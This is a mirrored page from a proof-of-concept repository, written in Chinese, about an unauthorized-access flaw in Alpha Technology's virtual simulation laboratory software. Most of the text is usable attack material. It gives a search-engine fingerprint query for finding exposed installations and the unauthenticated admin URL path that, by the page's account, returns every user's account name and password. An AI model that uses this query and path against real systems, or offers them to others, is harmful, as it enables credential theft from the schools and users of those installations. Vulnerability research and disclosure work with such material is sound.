admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/阿尔法科技 虚拟仿真实验室 未授权访问漏洞.md

35 lines
543 B
Markdown
Raw Normal View History

Web应用漏洞
2022-05-17 17:43:20 +08:00
# 阿尔法科技 虚拟仿真实验室 未授权访问漏洞
## 漏洞描述
阿尔法科技 虚拟仿真实验室 存在未授权访问漏洞通过访问构造的Url可以获取敏感信息
## 漏洞影响
```
虚拟仿真实验室
```
更新漏洞
2023-08-28 15:55:36 +08:00
## 网络测绘
Web应用漏洞
2022-05-17 17:43:20 +08:00
```
body="河南阿尔法科技有限公司"
```
## 漏洞复现
未授权的Url为
```plain
/admin/student/studentlist.html?page=1
```
更新漏洞
2022-12-05 11:09:28 +08:00
![](./images/202202101929331.png)
Web应用漏洞
2022-05-17 17:43:20 +08:00
成功获取所有用户的账号密码信息
## 参考文章
http://www.0dayhack.net/index.php/1702/
Reference in New Issue Copy Permalink